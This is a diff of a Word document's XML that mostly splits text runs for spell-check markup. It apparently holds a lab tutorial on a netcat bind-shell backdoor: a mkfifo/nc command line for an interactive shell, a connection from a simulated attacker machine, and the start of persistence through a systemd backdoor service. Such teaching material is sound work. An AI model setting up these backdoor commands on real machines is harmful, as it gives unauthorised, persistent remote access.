       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:br/>
-        <w:t>cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l 127.0.0.1 1234 &gt; /tmp/f</w:t>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f | /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2&gt;&amp;1 | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l 127.0.0.1 1234 &gt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -496,11 +722,61 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>rm -f /tmp/f; mkfifo /tmp/f</w:t>
+        <w:t>rm -f /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/f; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>mkfifo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">creates a named pipe, or FIFO (first in first out) buffer in the /tmp directory </w:t>
+        <w:t>creates a named pipe, or FIFO (first in first out) buffer in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directory </w:t>
       </w:r>
       <w:r>
         <w:t>with a name,</w:t>
@@ -521,8 +797,86 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l 127.0.0.1 1234 &gt; /tmp/f</w:t>
-      </w:r>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f | /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2&gt;&amp;1 | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l 127.0.0.1 1234 &gt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -540,18 +894,50 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>/bin/sh -i</w:t>
-      </w:r>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">opens a Bourne shell (sh) in interactive mode.  You could also use /bin/bash, but </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
+        <w:t>opens a Bourne shell (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:t>sh</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) in interactive mode.  You could also use /bin/bash, but </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> is on almost every Linux distribution</w:t>
       </w:r>
@@ -571,20 +957,30 @@
         <w:tab/>
         <w:t xml:space="preserve">send the standard error stream (2, STDERR) the same place that the output (1, STDOUT) goes, piping both into </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>nc</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>nc -l 127.0.0.1 1234</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l 127.0.0.1 1234</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -614,7 +1010,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>&gt; /tmp/f</w:t>
+        <w:t>&gt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -633,7 +1043,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>cat /tmp/f</w:t>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -653,7 +1077,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">So, whoever is connected to the nc listener sends commands.  </w:t>
+        <w:t xml:space="preserve">So, whoever is connected to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> listener sends commands.  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -665,7 +1103,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">hose commands to the named pipe.  The contents of the named pipe are given to the shell as input.  The output and error streams of the shell are sent to the nc listener, which sends them on to the person connected to the listener.  If you want a better explanation, see </w:t>
+        <w:t xml:space="preserve">hose commands to the named pipe.  The contents of the named pipe are given to the shell as input.  The output and error streams of the shell are sent to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> listener, which sends them on to the person connected to the listener.  If you want a better explanation, see </w:t>
       </w:r>
       <w:hyperlink r:id="rId16" w:history="1">
         <w:r>
@@ -692,7 +1144,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> by its inventor, Ed Skoudis.</w:t>
+        <w:t xml:space="preserve"> by its inventor, Ed </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Skoudis</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -770,7 +1236,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">If we run ss -nat to check for TCP listening </w:t>
+        <w:t>If we run ss -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>nat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to check for TCP listening </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -788,7 +1268,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Try to connect to the nc listener.  Note:  We are using the loopback address so we can do this with only one machine.  We will connect to the listener using another terminal window which simulates an attacker machine.</w:t>
+        <w:t xml:space="preserve">Try to connect to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> listener.  Note:  We are using the loopback address so we can do this with only one machine.  We will connect to the listener using another terminal window which simulates an attacker machine.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -939,23 +1433,33 @@
         </w:rPr>
         <w:t xml:space="preserve">  The </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>pwd</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
         <w:t xml:space="preserve"> command prints the working directory, </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>uname -a</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>uname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -963,12 +1467,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> gives us Linux version info, </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>whoami</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -991,7 +1497,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>cat /etc/lsb-release</w:t>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>lsb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>-release</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1041,7 +1575,77 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l 1234 &gt; /tmp/f</w:t>
+        <w:t>cat /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f | /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2&gt;&amp;1 | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l 1234 &gt; /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/f</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1053,7 +1657,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>This tells nc to listen on any interface instead of just the loopback interface.</w:t>
+        <w:t xml:space="preserve">This tells </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to listen on any interface instead of just the loopback interface.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1067,11 +1685,19 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>nc 192.168.77.129 1234</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.77.129 1234</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1101,7 +1727,21 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the same on both the listener and the client.</w:t>
+        <w:t xml:space="preserve"> the same </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> both the listener and the client.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1173,7 +1813,35 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
         <w:br/>
-        <w:t>The ^[[A happened when I typed an up arrow and ^[[B was a down arrow.  The sudo -i caused the shell to hang.</w:t>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>^[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>[A happened when I typed an up arrow and ^[[B was a down arrow.  The sudo -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> caused the shell to hang.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1182,8 +1850,13 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Next, create a systemd service with our command</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Next, create a systemd service with our </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>command</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1256,12 +1929,14 @@
         </w:rPr>
         <w:t xml:space="preserve">The problem now is that the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>ExecStart</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -1305,7 +1980,23 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>So, first create the shell script.  I named my script backdoor.sh and put it in the same directory where the systemd file backdoor.service will go.</w:t>
+        <w:t xml:space="preserve">So, first create the shell script.  I named my script backdoor.sh and put it in the same directory where the systemd file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>backdoor.service</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> will go.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1385,18 +2076,40 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>#!/bin/sh</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>bin/sh</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
         <w:br/>
-        <w:t>This tells the OS that we want to run this script in the /bin/sh shell.  (We could also have used /bin/bash)</w:t>
+        <w:t>This tells the OS that we want to run this script in the /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell.  (We could also have used /bin/bash)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1458,11 +2171,19 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
